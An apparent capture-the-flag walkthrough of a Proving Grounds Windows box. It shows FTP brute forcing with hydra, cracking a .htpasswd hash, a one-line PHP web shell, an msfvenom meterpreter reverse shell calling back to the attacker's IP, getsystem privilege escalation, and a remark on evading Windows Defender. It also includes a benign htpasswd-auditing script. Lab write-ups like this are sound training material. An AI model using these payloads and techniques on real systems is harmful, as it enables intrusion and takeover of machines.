Windows, PG Practice; IP address: 192.168.200.46; Difficulty: Intermediate
TL;DR
- The FTP server allows anonymous login; grab the potential account names and try to brute-force them.
- A service account in Windows always has SeImpersonatePrivilege; use that well.
Initial Enumeration
Scan all ports: kali > sudo nmap -sS 192.168.200.46 -p- -vv
Now rescan just the open ports: kali > sudo nmap -sS 192.168.200.46 -p21,242,3145,3389 -vv
- 21: FTP, allows anonymous login
- Nmap lists some of the files on the server
- 242: an Apache web server
- 3145: the admin interface of the zFTPServer that runs on port 21
- 3389: obviously the default Remote Desktop service
Let's start by enumerating port 21
- Anonymous login works, and the directory listing matches what Nmap told us.
- In the /accounts directory, three usernames are exposed: Offsec, anonymous, admin
- The trouble is that we can't read the files, and there is nothing to see in the backup folder either.
- Nothing else for us to enumerate on port 21.
Port 242 might be interesting, let's have a look
- It asks for login credentials, which we don't have yet, so leave it for now.
Port 3145 asks for FTP credentials as well, so maybe we could brute-force that too.
Gathering all the information we have so far, we know three possible account names
- anonymous
- Offsec
- admin
Let's try admin first. There is a good wordlist of default FTP credentials at https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt; save the file as userpass and run the following command
- hydra -C ./userpass ftp://192.168.200.46 -V -I
- Found that admin:admin is a valid login credential
For ports 242, 3145 and 3389, brute force does not work for any of the three usernames.
Initial Foothold
Logging in to port 21 with the credential admin:admin, we find the following files
- hello.txt and hello.php are two files I uploaded to test whether we have upload permission; it turns out we do.
- The key file is .htpasswd. Remember that on port 242 we were stopped immediately by HTTP basic authentication; the password hash for it is stored in .htpasswd.
- We can grab it by issuing the command ftp > get .htpasswd
- Found the following content in .htpasswd
- This is obviously a hash value; worry not, we have John the Ripper on our side
- Copy the hash value after offsec: into a file called hash, then run the following command
- john hash --wordlist=/usr/share/wordlists/rockyou.txt
- Got the password: elite
- Using the credential, we can view the page on port 242, but there is nothing there. That is enough for us, though.
- Remember that we uploaded a text file named hello.txt to the FTP server with the admin:admin credential; let's see whether we can view it in the browser
- Yes we can, so the FTP root is also the web root, and now things become very easy.
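The defensive lesson of this step is that the .htpasswd file was reachable from a writable FTP root and its hash fell to rockyou in seconds. The following added audit script (my own example, not part of this writeup) parses htpasswd entries over a constructed sample file, identifies the hash scheme from the prefix Apache writes, and flags every scheme other than bcrypt with an adequate cost as crackable offline; the sample users and hashes are made up for the demonstration.

```python
import re

# Constructed sample .htpasswd content (not the file from the box): one entry
# per scheme Apache's htpasswd can emit, plus a plaintext line.
SAMPLE_HTPASSWD = """\
offsec:$apr1$saltsalt$Q1B6x7aXb3t3l0y9k0Z7g/
legacy:{SHA}2jmj7l5rSw0yVb/vlWAYkK/YBwk=
oldcrypt:abJnggxhB/yWI
modern:$2y$10$7EqJtq98hPqEX7fNZaFWoOhi5XJtKF2KaZD1WXy9kW5BzYkT5/a4W
plain:changeme
"""

# Prefix each algorithm leaves in the hash field; bcrypt keeps its cost factor.
SCHEMES = [
    (re.compile(r"^\$2[aby]\$(\d{2})\$"), "bcrypt"),
    (re.compile(r"^\$apr1\$"), "apr1-md5"),
    (re.compile(r"^\{SHA\}"), "sha1"),
    (re.compile(r"^\$1\$"), "md5-crypt"),
    (re.compile(r"^[./0-9A-Za-z]{13}$"), "des-crypt"),
]

def classify(hash_field):
    """Return (scheme, bcrypt_cost_or_None) for one htpasswd hash field."""
    for pattern, name in SCHEMES:
        m = pattern.match(hash_field)
        if m:
            return name, (int(m.group(1)) if name == "bcrypt" else None)
    return "plaintext", None

def audit_htpasswd(text, min_bcrypt_cost=10):
    """Parse htpasswd text into {user: (scheme, verdict)}.
    Only bcrypt with a sufficient cost is rated 'ok'; every other scheme is
    fast to crack offline with a wordlist once the file leaks, as it did here."""
    findings = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if ":" not in line:
            raise ValueError(f"line {lineno}: not a user:hash entry")
        user, hash_field = line.split(":", 1)
        scheme, cost = classify(hash_field)
        if scheme == "bcrypt" and cost >= min_bcrypt_cost:
            verdict = "ok"
        elif scheme == "bcrypt":
            verdict = f"weak: bcrypt cost {cost} below {min_bcrypt_cost}"
        else:
            verdict = f"weak: {scheme} is fast to crack; rehash with htpasswd -B"
        findings[user] = (scheme, verdict)
    return findings
```

Rehashing alone is not enough: the file must also live outside any directory that FTP or the web server can read, which is the misconfiguration this box actually exploited.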
We need a local file inclusion exploit to get our initial foothold
- Upload a PHP file with the following content to the FTP server; I named it hello.php
- <?php echo shell_exec($_GET['cmd']); ?>
- Prepare a meterpreter reverse shell; it has to be the x86 version. I tried x64 and did not receive a callback.
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.170 LPORT=443 -f exe -o tcp443.exe
- Upload the meterpreter shell tcp443.exe to the FTP server as well, then browse to the following URL
- http://192.168.200.46:242/hello.php?cmd=tcp_x86_443.exe
- Here we receive the callback from the target host.
The local.txt flag is at c:\users\apache\desktop; not going to show it here.
Privilege Escalation
Privilege escalation is actually the easiest part of this box
- Running whoami /priv shows that we have SeImpersonatePrivilege.
- If you are using a meterpreter shell like I did, you only need to run
- getsystem -t 6
Side notes: I couldn't remember which option is for the SeImpersonatePrivilege escalation, so I tried -t 5 and -t 4; both failed. I know that running getsystem on its own will try each technique once and then grant me the privilege, but I try to avoid it because that will get detected by Windows Defender easily. However, if you specify the technique with the -t flag, Windows Defender won't see it; at least that was the case two years ago, not sure how it goes these days. Anyway, remember that if you have compromised a service account on a Windows machine, it will probably have SeImpersonatePrivilege set, which makes things very easy.
After completing this machine, I looked at the intended solution; it is obviously very interesting and worth learning.
Mission Accomplished!